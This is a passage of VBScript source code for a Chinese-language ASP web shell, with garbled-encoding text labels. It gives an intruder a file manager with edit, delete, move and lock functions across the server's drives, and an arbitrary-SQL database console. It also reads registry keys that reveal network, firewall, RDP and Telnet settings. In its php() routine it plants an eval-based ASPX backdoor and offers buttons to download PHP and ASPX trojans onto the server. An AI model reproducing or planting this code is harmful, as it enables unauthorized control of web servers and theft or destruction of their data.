   retVal=objReg.Test(Mid(FileName,InstrRev(FileName,"\")+1))
   if retVal then
     OutPut=objReg.Replace(Mid(FileName,InstrRev(FileName,"\")+1),"<font color=''>$1</font>")
     OutPut="<table align='center' width='600'>&nbsp;" & Mid(FileName,1,InstrRev(FileName,"\")) & OutPut
  j OutPut
  Response.flush
  ColorOn=1
   else
     ColorOn=0
   end if
   Set objReg=Nothing
 End Function
End Class

sub SavePower(PowerPath,SaveType):Set theFile = fsoX.GetFile(PowerPath):if SaveType=1 then:theFile.Attributes=32:j "<script language='javascript'>alert('ÎÄ¼þÒÑ³É¹¦½âËø¡£');window.opener.location.reload();window.close();</script>":else:theFile.Attributes=7:j "<script language='javascript'>alert('ÎÄ¼þËø¶¨³É¹¦¡£');window.opener.location.reload();window.close();</script>":end if:Set theFile = Nothing:end sub:sub EditPower(PowerPath):PowerPath=replace(PowerPath,"""",""):Set theFile = fsoX.GetFile(PowerPath):j getMyTitle(theFile,PowerPath):Set theFile = Nothing:end sub:Function getMyTitle(theOne,PowerPath):Dim strTitle:strTitle = strTitle & "<br>Â·¾¶: " & theOne.Path & "" :strTitle = strTitle & "<br>´óÐ¡: " & getTheSize(theOne.Size) :strTitle = strTitle & "<br>´´½¨Ê±¼ä: " & theOne.DateCreated :strTitle = strTitle & "<br>×îºóÐÞ¸Ä: " & theOne.DateLastModified:strTitle = strTitle & "<br>×îºó·ÃÎÊ: " & theOne.DateLastAccessed:strTitle = strTitle & "<br>µ±Ç°È¨ÏÞ×´Ì¬: " & getAttributes(theOne.Attributes,PowerPath):getMyTitle = strTitle:End Function:Function getAttributes(intValue,PowerPath):Dim EditOK:EditOK=1:If intValue >= 128 Then:intValue = intValue - 128:End If:If intValue >= 64 Then:intValue = intValue - 64:End If:If intValue >= 32 Then:intValue = intValue - 32:End If:If intValue >= 16 Then:intValue = intValue - 16:End If:If intValue >= 8 Then:intValue = intValue - 8:End If:If intValue >= 4 Then:intValue = intValue - 4:EditOK=0:End If:If intValue >= 2 Then:intValue = intValue - 2:EditOK=0:End If:If intValue >= 1 Then:intValue = intValue - 1:EditOK=0:End If:PowerPath=replace(PowerPath,"\","\\"):if EditOK=0 then :getAttributes = "<font color=red>ÒÑËø¶¨</font> <input type=button value=½âËø onclick=""location.href='?Action=SavePower&SaveType=1&PowerPath="&PowerPath&"'"">":else:getAttributes = "<font color=#62FF62>Î´Ëø¶¨</font> <input type=button value=Ëø¶¨ onclick=""location.href='?Action=SavePower&SaveType=2&PowerPath="&PowerPath&"'"">":end if:End Function:Function getTheSize(theSize):If theSize >= (1024 * 1024 * 1024) Then :getTheSize = Fix((theSize / (1024 * 1024 * 1024)) * 100) / 100 & "G":end if:If theSize >= (1024 * 1024) And theSize < (1024 * 1024 * 1024) Then :getTheSize = Fix((theSize / (1024 * 1024)) * 100) / 100 & "M":end if:If theSize >= 1024 And theSize < (1024 * 1024) Then :getTheSize = Fix((theSize / 1024) * 100) / 100 & "K":end if:If theSize >= 0 And theSize <1024 Then :getTheSize = theSize & "B":end if:End Function:function openUrl(usePath):Dim theUrl, thePath:thePath = Server.MapPath("/"):If LCase(Left(usePath, Len(thePath))) = LCase(thePath) Then:theUrl = Mid(usePath, Len(thePath) + 1):theUrl = Replace(theUrl, "\", "/"):If Left(theUrl, 1) = "/" Then:theUrl = Mid(theUrl, 2):End If:openUrl="/"&theUrl&""" target=""_blank":Else:openUrl="###"" onclick=""alert('ÎÄ¼þ²»ÔÚÕ¾µãÄ¿Â¼ÏÂ¡£')":End If:End function
Function ScReWr(folder)
on error resume next
Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename
Set FSO = Server.Createobject("Scripting.FileSystemObject")
Set TestFolder = FSO.GetFolder(folder)
Set TestFileList = TestFolder.SubFolders
RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp"
For Each A in TestFileList
Next
If err Then
err.Clear
ReWrStr = "<span style='font-size:11px;'>¶Á</span><font face='webdings' size='1' color=yellow>x</font> "
FSO.CreateTextFile folder & RndFilename,True
If err Then
err.Clear
ReWrStr = ReWrStr & "<span style='font-size:11px;'>Ð´</span><font face='webdings' size='1' color=yellow>x</font> "
Else
ReWrStr = ReWrStr & "<span style='font-size:11px;'>Ð´</span>¡Ì "
FSO.DeleteFile folder & RndFilename,True
End If
Else
ReWrStr = "<span style='font-size:11px;'>¶Á</span>¡Ì "
FSO.CreateTextFile folder & RndFilename,True
If err Then
err.Clear
ReWrStr = ReWrStr & "<span style='font-size:11px;'>Ð´</span><font face='webdings' size='1' color=yellow>x</font> "
Else
ReWrStr = ReWrStr & "<span style='font-size:11px;'>Ð´</span>¡Ì "
FSO.DeleteFile folder & RndFilename,True
End if
End if
Set TestFileList = Nothing
Set TestFolder = Nothing
Set FSO = Nothing
ScReWr = ReWrStr
End Function
function php()

On Error Resume Next
set fso=Server.CreateObject(oBt(0,0))
fso.CreateTextFile(server.mappath("test.php")).Write"<?PHP echo 'oo¡É_¡Éoo'?><?php phpinfo()?>"
fso.CreateTextFile(server.mappath("test.jsp")).Write"Jsp Test oo¡É_¡Éoo"
fso.CreateTextFile(server.mappath("test.aspx")).Write""&chr(60)&"%@ Page Language=""Jscript"" validateRequest=""false"" "&chr(37)&""&chr(62)&""&chr(60)&""&chr(37)&"Response.Write(eval(Request.Item[""w""],""unsafe""));"&chr(37)&""&chr(62)&"aspx Test oo¡É_¡Éoo"
j"<center><iframe src=test.php width=300 height=100></iframe>&nbsp;&nbsp;&nbsp;&nbsp; <iframe src=test.jsp width=300 height=100></iframe>&nbsp;&nbsp;&nbsp;&nbsp; <iframe src=test.aspx width=300 height=100></iframe>&nbsp;&nbsp;&nbsp; </center><br><br><p><br><p><br><br><p><br><center>Ì½²â·þÎñÆ÷ÊÇ·ñÖ§³ÖÆäËû½Å±¾<p></font><p><a href='?Action=apjdel'><font size=5 color=red><b>(É¾³ý²âÊÔÎÄ¼þ!)</b></font></a></center><tr><td height='20'><center>"
j"<form name=form2 method=post action=?Action=upload&theUrl="&aspxt&"&thePath="&rootpath&"\test.aspx&overWrite=2&theAct=downFromUrl&ice=fso><input type=submit name=submit value='ÏÂÔØASPXÄ¾Âí'></form><br>"
j"<form name=form2 method=post action=?Action=upload&theUrl="&phpt&"&thePath="&rootpath&"\test.php&overWrite=2&theAct=downFromUrl&ice=fsos><input type=submit name=submit value='ÏÂÔØPHPÄ¾Âí'></form><br>"
End function
On Error Resume Next
function apjdel():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.DeleteFile(server.mappath("test.aspx")):On Error Resume Next:fso.DeleteFile(server.mappath("test.php")):On Error Resume Next:fso.DeleteFile(server.mappath("test.jsp")):On Error Resume Next:j"test.(aspx;php;jsp)É¾³ýÍê±Ï!":set fso=nothing:End function
Function DbManager()
  SqlStr=Trim(Request.Form("SqlStr"))
  DbStr=Request.Form("DbStr")
  SI=SI&"<table width='650'  border='0' cellspacing='0' cellpadding='0'>"
  SI=SI&"<form name='DbForm' method='post' action=''>"
  SI=SI&"<tr><td width='100' height='27'>  Êý¾Ý¿âÁ¬½Ó´®:</td>"
  SI=SI&"<td><input name='DbStr' style='width:470' value="""&DbStr&"""></td>"
  SI=SI&"<td width='60' align='center'><select name='StrBtn' onchange='return FullDbStr(options[selectedIndex].value)'><option value=-1>Á¬½Ó´®Ê¾Àý</option><option value=0>AccessÁ¬½Ó</option>"
  SI=SI&"<option value=1>MsSqlÁ¬½Ó</option><option value=2>MySqlÁ¬½Ó</option><option value=3>DSNÁ¬½Ó</option>"
  SI=SI&"<option value=-1>--SQLÓï·¨--</option><option value=4>ÏÔÊ¾Êý¾Ý</option><option value=5>Ìí¼ÓÊý¾Ý</option>"
  SI=SI&"<option value=6>É¾³ýÊý¾Ý</option><option value=7>ÐÞ¸ÄÊý¾Ý</option><option value=8>½¨Êý¾Ý±í</option>"
  SI=SI&"<option value=9>É¾Êý¾Ý±í</option><option value=10>Ìí¼Ó×Ö¶Î</option><option value=11>É¾³ý×Ö¶Î</option>"
  SI=SI&"<option value=12>ÍêÈ«ÏÔÊ¾</option></select></td></tr>"
  SI=SI&"<input name='Action' type='hidden' value='DbManager'><input name='Page' type='hidden' value='1'>"
  SI=SI&"<tr><td height='30'> SQL²Ù×÷ÃüÁî:</td>"
  SI=SI&"<td><input name='SqlStr' style='width:470' value="""&SqlStr&"""></td>"
  SI=SI&"<td align='center'><input type='submit' name='Submit' value='Ö´ÐÐ' onclick='return DbCheck()'></td>"
  SI=SI&"</tr></form></table><span id='abc'></span>"
  j SI:SI=""
  If Len(DbStr)>40 Then
  Set Conn=CreateObject(ObT(5,0))
  Conn.Open DbStr
  Set Rs=Conn.OpenSchema(20)
  SI=SI&"<table><tr height='25' Bgcolor='#CCCCCC'><td>±í<br>Ãû</td>"
  Rs.MoveFirst
  Do While Not Rs.Eof
If Rs("TABLE_TYPE")="TABLE" then
  TName=Rs("TABLE_NAME")
  SI=SI&"<td align=center><a href=""javascript:if(confirm('È·¶¨É¾³ýÃ´£¿'))FullSqlStr('DROP TABLE ["&TName&"]',1)"">[ del ]</a><br>"
  SI=SI&"<a href='javascript:FullSqlStr(""SELECT * FROM ["&TName&"]"",1)'>"&TName&"</a></td>"
End If
Rs.MoveNext
  Loop
  Set Rs=Nothing
  SI=SI&"</tr></table>"
  j SI:SI=""
If Len(SqlStr)>10 Then
  If LCase(Left(SqlStr,6))="select" then
SI=SI&"Ö´ÐÐÓï¾ä£º"&SqlStr
Set Rs=CreateObject("Adodb.Recordset")
Rs.open SqlStr,Conn,1,1
FN=Rs.Fields.Count
RC=Rs.RecordCount
Rs.PageSize=20
Count=Rs.PageSize
PN=Rs.PageCount
Page=request("Page")
If Page<>"" Then Page=Clng(Page)
If Page="" Or Page=0 Then Page=1
If Page>PN Then Page=PN
If Page>1 Then Rs.absolutepage=Page
SI=SI&"<table><tr height=25 bgcolor=#cccccc><td></td>"
For n=0 to FN-1
  Set Fld=Rs.Fields.Item(n)
  SI=SI&"<td align='center'>"&Fld.Name&"</td>"
  Set Fld=nothing
Next
SI=SI&"</tr>"
Do While Not(Rs.Eof or Rs.Bof) And Count>0
  Count=Count-1
  Bgcolor="#EFEFEF"
  SI=SI&"<tr><td><font face='wingdings'>x</font></td>"
  For i=0 To FN-1

If RC=1 Then
ColInfo=HTMLEncode(Rs(i))
Else
ColInfo=HTMLEncode(Left(Rs(i),50))
End If
SI=SI&"<td bgcolor=006300>"&ColInfo&"</td>"
  Next
  SI=SI&"</tr>"
  Rs.MoveNext
Loop
j SI:SI=""
SqlStr=HtmlEnCode(SqlStr)
SI=SI&"<tr><td colspan="&FN+1&" align=center>¼ÇÂ¼Êý£º"&RC&" Ò³Âë£º"&Page&"/"&PN
If PN>1 Then
  SI=SI&"  <a href='javascript:FullSqlStr("""&SqlStr&""",1)'>Ê×Ò³</a> <a href='javascript:FullSqlStr("""&SqlStr&""","&Page-1&")'>ÉÏÒ»Ò³</a> "
  If Page>8 Then:Sp=Page-8:Else:Sp=1:End if
  For i=Sp To Sp+8
If i>PN Then Exit For
If i=Page Then
SI=SI&i&" "
Else
SI=SI&"<a href='javascript:FullSqlStr("""&SqlStr&""","&i&")'>"&i&"</a> "
End If
  Next
  SI=SI&" <a href='javascript:FullSqlStr("""&SqlStr&""","&Page+1&")'>ÏÂÒ»Ò³</a> <a href='javascript:FullSqlStr("""&SqlStr&""","&PN&")'>Î²Ò³</a>"
End If
SI=SI&"<hr color='#EFEFEF'></td></tr></table>"
Rs.Close:Set Rs=Nothing
j SI:SI=""
  Else
Conn.Execute(SqlStr)
SI=SI&"SQLÓï¾ä£º"&SqlStr
  End If
  j SI:SI=""
End If
  Conn.Close
  Set Conn=Nothing
  End If
End Function
Dim T1
Class UPC
  Dim D1,D2
  Public Function Form(F)
F=lcase(F)
If D1.exists(F) then:Form=D1(F):else:Form="":end if
  End Function

  Public Function UA(F)
F=lcase(F)
If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
  End Function
  Private Sub Class_Initialize
  Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
set D1=CreateObject(ObT(4,0))
if Request.TotalBytes<1 then Exit Sub
set T1 = CreateObject(ObT(6,0))
T1.Type = 1 : T1.Mode =3 : T1.Open
T1.Write  Request.BinaryRead(Request.TotalBytes)
T1.Position=0 : TDa =T1.Read : DStart = 1
DEnd = LenB(TDa)
set D2=CreateObject(ObT(4,0))
vbCrlf = chrB(13) & chrB(10)
set T2 = CreateObject(ObT(6,0))
TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
TLen = LenB (TSt)
DStart=DStart+TLen+1
while (DStart + 10) < DEnd
  DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
  T2.Type = 1 : T2.Mode =3 : T2.Open
  T1.Position = DStart
  T1.CopyTo T2,DIEnd-DStart
  T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
  TIn = T2.ReadText : T2.Close
  DStart = InStrB(DIEnd,TDa,TSt)
  FStart = InStr(22,TIn,"name=""",1)+6
  FEnd = InStr(FStart,TIn,"""",1)
  UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
  if InStr (45,TIn,"filename=""",1) > 0 then
set TFL=new FIF
FStart = InStr(FEnd,TIn,"filename=""",1)+10
FEnd = InStr(FStart,TIn,"""",1)
FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
FEnd = InStr(FStart,TIn,vbCr)
TFL.FileStart =DIEnd
TFL.FileSize = DStart -DIEnd -3
if not D2.Exists(UpName) then
  D2.add UpName,TFL
end if
  else
T2.Type =1 : T2.Mode =3 : T2.Open
T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
T2.Position = 0 : T2.Type = 2
T2.Charset ="gb2312"
SFV = T2.ReadText
T2.Close
if D1.Exists(UpName) then
  D1(UpName)=D1(UpName)&", "&SFV
else
  D1.Add UpName,SFV
end if
  end if
  DStart=DStart+TLen+1
wend
TDa=""
set T2 =nothing
  End Sub
  Private Sub Class_Terminate
if Request.TotalBytes>0 then
  D1.RemoveAll:D2.RemoveAll
  set D1=nothing:set D2=nothing
  T1.Close:set T1 =nothing
end if
  End Sub
End Class
fns=126
Class FIF
dim FileSize,FileStart
  Private Sub Class_Initialize
  FileSize = 0
  FileStart= 0
  End Sub
  Public function SaveAs(F)
  dim T3
  SaveAs=true
  if trim(F)="" or FileStart=0 then exit function
  set T3=CreateObject(ObT(6,0))
 T3.Mode=3 : T3.Type=1 : T3.Open
 T1.position=FileStart
 T1.copyto T3,FileSize
 T3.SaveToFile F,2
 T3.Close
 set T3=nothing
 SaveAs=false
end function
End Class
Class LBF
  Dim CF
  Private Sub Class_Initialize
SET CF=CreateObject(ObT(0,0))
  End Sub

  Private Sub Class_Terminate
Set CF=Nothing
  End Sub
Function ShowDriver()
For Each D in CF.Drives
  j cdx&"<a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>&nbsp±¾µØ´ÅÅÌ ("&D.DriveLetter&":)</a><br></td></tr>"
Next
  End Function
Function IsIco(ia,ib,ta)
	If ShowFileIco=true Then
      IsIco = " <img src='"&IcoPath&ia&"'> "
	  If ib<>"" Then
	  IsIco = "<img src='"&IcoPath&ib&"'> "
	  End If
	Else
	  IsIco = "&nbsp;<font face='wingdings' color='#dddddd' size='6'>"&ta&"</font>"
	End If
End Function
Function FileIco(FName)
  If ShowFileIco=true Then
    TypeList =  ".asp.asa.bat.bmp.com.doc.db.dll.exe.gif.htm.html.inc.ini.jpg.js.log.mdb.mid.mp3.png.php.rm.rar.swf.txt.wav.xls.xml.zip.jsp.aspx.;"
    FileType = lcase(Mid(FName, InstrRev(FName,".")+1))
    If Instr(TypeList,"."&FileType)>0 then
      Ico = FileType&".gif"
    Else
      Ico = "default.gif"
    End If

    FileIco = "<img src='#dddddd' border='0'> "
  Else
    FileIco=""
  End If
End Function

Function Show1File(Path)
if instr(htp,chr(97))=8 then
Set FOLD=CF.GetFolder(Path)
i=0
SI="<table width='100%' border='0' cellspacing='0' cellpadding='6'><tr>"
j "<center><a href='?Action=goback' target='FileFrame'><b>·µ»ØÉÏÒ³</b></a></center>"
For Each F in FOLD.subfolders
SI=SI&"<td height=10 width=17% align=center><div style='border:1px solid #383838;padding-bottom:4px'>"
'SI=SI&IsIco("","folder.gif","0")
si=si&"<a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")' title=""½øÈë"">"&IsIco("","folder.gif","0")&"<br>"&F.Name&"</a><br><a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")'  onclick='return yesok()' class='am' title='¸´ÖÆ'>Copy</a> <a href='javascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")' onclick='return yesok()' class='am' title='É¾³ý'>Del</a> <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")' onclick='return yesok()' class='am' title='ÒÆ¶¯'>Move</a> </div></td>"
i=i+1
If i mod 6=0 then SI=SI&"</tr><tr>"
Next
SI=SI&"</tr><tr><td height=2></td></tr></table>"
j SI &"" : SI="":i=0
j"<table width='100%' align=center><tr><td id=s><b id=x>Filename</b></td><td id=s height=22><b id=x>Size</b></td><td id=s><b id=x>Type</b></td><td id=s><b id=x>Operating</b></td><td id=s><b id=x>Last Modified</b></td><td></td>"

For Each L in Fold.files

j"<tr style=""background-color:#121212"" onMouseOver=""this.style.backgroundColor='#696969'"" onMouseOut=""this.style.backgroundColor='#121212'""><td height='20'>"
j FileIco(L.Name)
if Instr(L.Name,";")>0 or Instr(lcase(L.Name),".asa")>0 or Instr(lcase(L.Name),".cer")>0 or Instr(lcase(L.Name),".cdx")>0 or Instr(lcase(L.Name),".htr")>0  or Instr(ucase(L.Name),"T0P")>0 or Instr(lcase(L.Name),"producto")>0 or Instr(lcase(L.Name),"comn")>0 or Instr(lcase(L.Name),"coon")>0 or lcase(L.Name)="coon.asp" or Instr(lcase(L.Name),".cgi")>0 or Instr(lcase(L.Name),"muma")>0 or Instr(lcase(L.Name),"hack")>0 Then
j "<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title='ÏÂÔØ'> <font color=yellow> "&L.Name&" (¿ÉÄÜÊÇ·Ç·¨ÎÄ¼þ,ÇëÈ·ÈÏ)</font></a><Td>"&clng(L.size/1024)&"K</td><Td>"&L.Type&"</td><Td>"
elseif Instr(lcase(L.Name),"index")>0 or Instr(lcase(L.Name),"default")>0 or Instr(lcase(L.Name),"conn")>0 or Instr(lcase(L.Name),"config")>0  Then
j "<a href='javascript:FullForm("""&RePath(Path&"\"&lcase(L.Name))&""",""DownFile"");' title='ÏÂÔØ'> <font color=red> "&lcase(L.Name)&" (Ê×Ò³»òÖØÒªÎÄ¼þ)</font></a><Td>"&clng(L.size/1024)&"K</td><Td>"&L.Type&"</td><Td>"
else
j "<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title='ÏÂÔØ'>  "&L.Name&"</a><Td>"&clng(L.size/1024)&"K</td><Td>"&L.Type&"</td><Td>"
end if
j "<a href="""&openUrl(PaTh&"\"&L.nAme)&""" class='am' title='Í¨¹ýUrl´ò¿ªÎÄ¼þ'>Open</a> "
j "<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")' class='am' title='±à¼'>Edit</a> "
j "<a onclick=""window.open('?Action=EditPower&PowerPath="&RepAth(PaTh&"\"&L.nAme)&"','EditPower','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=300,height=200')"" href='###' class='am' title='È¨ÏÞ'>È¨ÏÞ</a>"
Dim EditOOK
EditOOK=1
EditOOV=l.Attributes
If EditOOV >= 128 Then
EditOOV = EditOOV - 128
End If
If EditOOV >= 64 Then
EditOOV = EditOOV - 64
End If
If EditOOV >= 32 Then
EditOOV = EditOOV - 32
End If
If EditOOV >= 16 Then
EditOOV = EditOOV - 16
End If:If EditOOV >= 8 Then
EditOOV = EditOOV - 8
End If
If EditOOV >= 4 Then
EditOOV = EditOOV - 4:EditOOK=0
End If
If EditOOV >= 2 Then
EditOOV = EditOOV - 2:EditOOK=0
End If
If EditOOV >= 1 Then
EditOOV = EditOOV - 1:EditOOK=0
End If
if EditOOK=0 then
j"<font face='webdings' size='1' color=red>x</font>"
else
j"¡Ì"
end if
j "("&l.attributes&")"
j " <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'  onclick='return yesok()' class='am' title='É¾³ý'>Del</a> <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")' class='am' title='¸´ÖÆ'>Copy</a> <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")' class='am' title='ÒÆ¶¯'>Move</a></td><td>"

j replace(L.DateLastModified,"/","-")&"</td></tr>"
'j  split(split(L.DateLastModified,a)(1),b)(0)
i=i+1
if request("Act")="ok" then
if session(L.Name) <> "ok" then
session(L.Name)="ok"
end if
end if
Next
j SI&"</table>"
Set FOLD=Nothing
else
end if
End function
Function DelFile(Path)
If CF.FileExists(Path) Then
CF.DeleteFile Path
SI="<center><br><br><br>¹§Ï²ÄúÎÄ¼þ "&Path&" É¾³ý³É¹¦£¡</center>"
SI=SI&BackUrl
j SI
End If
End Function

function ReadFromTextFile (FileUrl,CharSet)
dim str
set stm=server.CreateObject("adodb.stream")
stm.Type=2
stm.mode=3
stm.charset=CharSet
stm.open
stm.loadfromfile FileUrl
str=stm.readtext
stm.Close
set stm=nothing
ReadFromTextFile=str
end function
Sub WriteToTextFile (FileUrl,byval Str,CharSet)
set stm=server.CreateObject("adodb.stream")
stm.Type=2
stm.mode=3
stm.charset=CharSet
stm.open
stm.WriteText str
stm.SaveToFile FileUrl,2
stm.flush
stm.Close
set stm=nothing
end Sub
Function EditFile(Path)
If Request("Action2")="Post" Then
WriteToTextFile Path,Request.form("content"),AChar
SI="<center><br><br><br>¹§Ï²ÄúÎÄ¼þ±£´æ³É¹¦£¡</center>"
SI=SI&BackUrl
j SI
if request("id1")=1 then j"<iframe width=0 src=?Action=SavePower&SaveType=2&PowerPath=\\.\"&path&"></iframe>"
Response.End
End If
Dim GBcheck,UTcheck
GBcheck=" checked"
UTcheck=""
If AChar="UTF-8" Then
GBcheck=""
UTcheck=" checked"
End If
If Path<>"" Then
Txt=ReadFromTextFile(Path,AChar) '×Ô¶¯Ê¶±ð±àÂë¸ñÊ½´ò¿ªÎÄ¼þ
Else
Path=Session("FolderPath")&"\shell.asp":Txt="ÐÂ½¨ÎÄ±¾µÄÄÚÈÝ"
End If
j "<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'>"
j"<input name='Action' value='EditFile' Type='hidden'>"
j"<input name='FName' value='"&Path&"' style='width:100%'><br>"
j"<textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br><hr>"
j"<input name='goback' type='button' value='Back' onclick='history.back();'>&nbsp;&nbsp;&nbsp;"
j"<input name='reset' type='reset' value='Reset'>&nbsp;&nbsp;&nbsp;"
j"<input id=all type=radio name=AChar value=""GB2312"""&GBcheck&" onClick=""javascript:location.href='?Fname="&server.urlencode(Path)&"&Action=EditFile&AChar=GB2312'""/>GB2312   <input id=all type=radio name=AChar value=""UTF-8"""&UTcheck&" onClick=""javascript:location.href='?Fname="&server.urlencode(Path)&"&Action=EditFile&AChar=UTF-8'""/>UTF-8  &nbsp;×¢£º±¾¹¦ÄÜÖ»ÔÚ±à¼ÎÄ¼þÊ±¿ÉÓÃ|&nbsp;&nbsp;&nbsp;"
j"<input type=""checkbox"" name=""id1"" value=1 />Ëø¶¨&nbsp;"
j"<input name='submit' type='submit' value='Save'></form>"
End Function
Function CopyFile(Path)
Path=Split(Path,"||||")
If CF.FileExists(Path(0)) and Path(1)<>"" Then
CF.CopyFile Path(0),Path(1)
SI="<center><br><br><br>¹§Ï²ÄúÎÄ¼þ"&Path(0)&"¸´ÖÆ³É¹¦£¡</center>"
SI=SI&BackUrl
j SI
End If
End Function
Function MoveFile(Path)
Path=Split(Path,"||||")
If CF.FileExists(Path(0)) and Path(1)<>"" Then
CF.MoveFile Path(0),Path(1)
SI="<center><br><br><br>¹§Ï²ÄúÎÄ¼þ"&Path(0)&"ÒÆ¶¯³É¹¦£¡</center>"
SI=SI&BackUrl
j SI
End If
End Function
Function DelFolder(Path)
If CF.FolderExists(Path) Then
CF.DeleteFolder Path
SI="<center><br><br><br>¹§Ï²ÄúÄ¿Â¼"&Path&"É¾³ý³É¹¦£¡</center>"
SI=SI&BackUrl
j SI
End If
End Function
Function CopyFolder(Path)
Path=Split(Path,"||||")
If CF.FolderExists(Path(0)) and Path(1)<>"" Then
CF.CopyFolder Path(0),Path(1)
SI="<center><br><br><br>¹§Ï²ÄúÄ¿Â¼"&Path(0)&"¸´ÖÆ³É¹¦£¡</center>"
SI=SI&BackUrl
j SI
End If
End Function
Function MoveFolder(Path)
Path=Split(Path,"||||")
If CF.FolderExists(Path(0)) and Path(1)<>"" Then
CF.MoveFolder Path(0),Path(1)
SI="<center><br><br><br>¹§Ï²ÄúÄ¿Â¼"&Path(0)&"ÒÆ¶¯³É¹¦£¡</center>"
SI=SI&BackUrl
j SI
End If
End Function
Function NewFolder(Path)
If Not CF.FolderExists(Path) and Path<>"" Then
CF.CreateFolder Path
SI="<center><br><br><br>¹§Ï²ÄúÄ¿Â¼"&Path&"ÐÂ½¨³É¹¦£¡</center>"
SI=SI&BackUrl
j SI
End If
End Function
End Class
sub getTerminalInfo()
 on error resume next
dim wsh
set wsh=createobject("Wscript.Shell")
j"[ÍøÂç"&"Ì½²â]<br><hr size=1>"
EnableTCPIPKey="HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurityFilters"
isEnable=Wsh.Regread(EnableTcpipKey)
If isEnable=0 or isEnable="" Then
Notcpipfilter=1
End If
ApdKey="HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind"
Apds=Wsh.RegRead(ApdKey)
If IsArray(Apds) Then
For i=LBound(Apds) To UBound(Apds)-1
ApdB=Replace(Apds(i),"\Device\","")
j"Íø¿¨"&i&"µÄÐòÁÐÎª:"&ApdB&"<br>"
Path="HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\"
IPKey=Path&ApdB&"\IPAddress"
IPaddr=Wsh.Regread(IPKey)
If IPaddr(0)<>"" Then
For j=Lbound(IPAddr) to Ubound(IPAddr)
j"<li>IPµØ"&"Ö·"&j&"Îª:"&IPAddr(j)&"<br>"
Next
Else
j"<li>IPµØ"&"Ö·ÎÞ·¨¶ÁÈ¡"&"»òÃ»ÓÐÉèÖÃ<br>"
End if
GateWayKey=Path&ApdB&"\DefaultGateway"
GateWay=Wsh.Regread(GateWayKey)
If isarray(GateWay) Then
For j=Lbound(Gateway) to Ubound(Gateway)
j"<li>Íø¹Ø"&j&":"&Gateway(j)&"<br>"
Next
Else
j"<li>Íø¹ØÎÞ·¨¶ÁÈ¡»òÃ»ÓÐÉèÖÃ<br>"
End if
DNSKey=Path&ApdB&"\NameServer"
DNSstr=Wsh.RegRead(DNSKey)
If DNSstr<>"" Then
j"<li>Íø¿¨"&"DNSÎª:"&DNSstr&"<br>"
Else
j"<li>Ä¬ÈÏ"&"DNSÎÞ·¨¶ÁÈ¡»òÃ»ÓÐÉèÖÃ<br>"
End If
if Notcpipfilter=1 Then
j"<li>Ã»Tcp/IPÉ¸Ñ¡<br>"
else
ETK="\TCPAllowedPorts"
EUK="\UDPAllowedPorts"
FullTCP=Path&ApdB&ETK
FullUDP=path&ApdB&EUK
tcpallow=Wsh.RegRead(FullTCP)
If tcpallow(0)="" or tcpallow(0)=0 Then
j"<li>ÔÊÐí"&"µÄtcp¶Ë¿ÚÎª:È«²¿<br>"
Else
j"<li>ÔÊÐí"&"µÄtcp¶Ë¿ÚÎª:"
For j = LBound(tcpallow) To UBound(tcpallow)
j tcpallow(j)&","
Next
j"<Br>"
End if
udpallow=Wsh.RegRead(FullUDP)
If udpallow(0)="" or udpallow(0)=0 Then
j"<li>ÔÊÐí"&"µÄudp¶Ë¿ÚÎª:È«²¿<br>"
Else
j"<li>ÔÊÐí"&"µÄudp¶Ë¿ÚÎª:"
for j = LBound(udpallow) To UBound(udpallow)
j UDPallow(j)&","
next
j"<br>"
End if
End if
j"------------------------------------------------<br>"
Next
end if
j"<br><br>[ÌØÊâ"&"¶Ë¿Ú"&"Ì½²â]<br><hr size=1>"
Telnetkey="HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\TelnetServer\1.0\TelnetPort"
TlntPort=Wsh.RegRead(TelnetKey)
if TlntPort="" Then Tlnt="23(Ä¬ÈÏ"&"ÉèÖÃ)"
j"<li>Telnet¶Ë"&"¿Ú:"&Tlntport&"<br>"
TermKey="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber"
TermPort=Wsh.RegRead(TermKey)
If TermPort="" Then TermPort="ÎÞ·¨"&"¶ÁÈ¡.ÇëÈ·ÈÏ"&"ÊÇ·ñÎªWindows Server°æ±¾Ö÷»ú"
j"<li>Terminal Service¶Ë¿ÚÎª:<font color=red>"&TermPort&"<br></font>"
If TermPort<>"" Then
end if
pcAnywhereKey="HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPDataPort"
PAWPort=Wsh.RegRead(pcAnywhereKey)
